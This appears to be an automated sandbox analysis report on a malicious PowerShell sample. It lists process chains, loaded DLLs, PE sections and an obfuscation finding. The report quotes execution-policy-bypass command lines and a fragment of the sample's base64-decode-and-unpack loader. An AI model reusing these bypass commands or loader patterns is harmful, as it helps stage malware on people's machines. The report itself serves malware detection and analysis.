              Source: devtools_resources.pak.0.drBinary or memory string: insertAt=this._consoleMessages.upperBound(viewMessage,timeComparator);const insertedInMiddle=insertAt<this._consoleMessages.length;this._consoleMessages.splice(insertAt,0,viewMessage);this._filter.onMessageAdded(message);this._sidebar.onMessageAdded(viewMessage);let shouldGoIntoGroup=false;if(message.isGroupable()){const groupKey=viewMessage.groupKey();shouldGoIntoGroup=this._groupSimilarSetting.get()&&this._groupableMessages.has(groupKey);let list=this._groupableMessages.get(groupKey);if(!list){list=[];this._groupableMessages.set(groupKey,list);}
              Source: bUAmCazc.ps1ReversingLabs: Detection: 15%
              Source: Setup.exeString found in binary or memory: sun/launcher/LauncherHelper
              Source: Setup.exeString found in binary or memory: -help
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\bUAmCazc.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
              Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe "C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exe C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
              Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pla.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pla.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: C:\Users\user\AppData\Roaming\Driver\MNCVUBXYFIKB\Setup.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: bUAmCazc.ps1Static file information: File size 35869954 > 1048576
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FeGIPCnK\msvcr90.dllJump to behavior
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdb source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: C:\jenkins\workspace\dev\juno-win_live\build\cefSubProcess\pc64-vc-tool-opt\bin\EACefSubProcess.pdb source: Updater.ex.0.dr
              Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Setup.exe, 00000003.00000002.1938482708.0000000003614000.00000004.00000001.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1937911745.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000003.00000002.1938160688.0000000003260000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000007.00000002.2193366185.0000000005330000.00000004.00001000.00020000.00000000.sdmp, more.com, 00000007.00000002.2185097182.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580786924.0000000004CF2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2581036694.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210939442.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2211064893.0000000003230000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Mark\code\github\NAudio\NAudio\obj\Release\net35\NAudio.pdbSHA256do source: powershell.exe, 00000000.00000002.1992948747.000001AD686AE000.00000004.00000800.00020000.00000000.sdmp, NAudio.dll.0.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-x64-cygwin-sans-NAS\jdk8u381\237\build\windows-x64\jdk\objs\javaw_objs\javaw.pdb source: Setup.exe, 00000003.00000002.1937686145.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000006.00000000.1932096504.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, Setup.exe, 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp, more.com, 00000007.00000002.2189552359.000000000522F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2580918352.00000000050A6000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 0000000C.00000002.2210831777.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($BZpHtpWl) [System.IO.File]::WriteAllBytes($UIEJKDyL, $oSuxTDwx) $jffBIRgk = New-Item -ItemType Directory -Path $hPZFucyy try { $xkhSPQpT = Expand-Archive -Path $UIEJK
              Source: NAudio.dll.0.drStatic PE information: 0xCC972473 [Sat Oct 8 12:22:11 2078 UTC]
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00401CB0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,OutputDebugStringA,__iob_func,fprintf,3_2_00401CB0
              Source: initial sampleStatic PE information: section where entry point is pointing to: _COF2
              Source: Setup.exe.0.drStatic PE information: real checksum: 0x7592 should be: 0x73ad
              Source: python27.dll.0.drStatic PE information: section name: _COF0
              Source: python27.dll.0.drStatic PE information: section name: _COF1
              Source: python27.dll.0.drStatic PE information: section name: _COF2
              Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
              Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
              Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
              Source: Resource.ct.0.drStatic PE information: section name: .gxfg
              Source: Resource.ct.0.drStatic PE information: section name: .retplne
              Source: Resource.ct.0.drStatic PE information: section name: .voltbl
              Source: Resource.ct.0.drStatic PE information: section name: CPADinfo
              Source: Resource.ct.0.drStatic PE information: section name: LZMADEC
              Source: Resource.ct.0.drStatic PE information: section name: _RDATA
              Source: Resource.ct.0.drStatic PE information: section name: malloc_h
              Source: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exeCode function: 3_2_00402F71 push ecx; ret 3_2_00402F84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F039 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0340F039 push edi; retn 0045h11_3_0340F03C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_03416F57 push cs; iretd 11_3_03416F65
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_0341648D push es; iretd 11_3_03416495
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_3_03416498 push es; iretd 11_3_03416495
